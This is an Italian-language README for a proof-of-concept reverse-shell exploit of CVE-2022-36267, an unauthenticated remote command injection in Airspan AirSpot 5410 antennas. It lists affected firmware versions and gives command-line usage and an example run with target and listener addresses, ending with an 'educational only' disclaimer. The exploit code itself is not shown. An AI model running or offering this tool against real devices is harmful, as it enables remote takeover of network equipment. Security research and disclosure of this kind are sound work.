
PoC Script per CVE-2022-36267: Sfrutta una vulnerabilità di iniezione di comandi remoti non autenticata nell'antenna Airspan AirSpot 5410.
Questo repository contiene uno script Proof of Concept (PoC) di reverse shell per sfruttare CVE-2022-36267, una vulnerabilità critica nei dispositivi Airspan AirSpot 5410. Lo script è una dimostrazione pratica, che integra l'analisi approfondita fornita nel post del blog "Airspan AirSpot 5410 - Vulnerability Report."
Tutti i dispositivi Airspan AirSpot 5410 dalla versione 0.3.4.1-4 e inferiori.
# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

SOLO A SCOPO EDUCATIVO.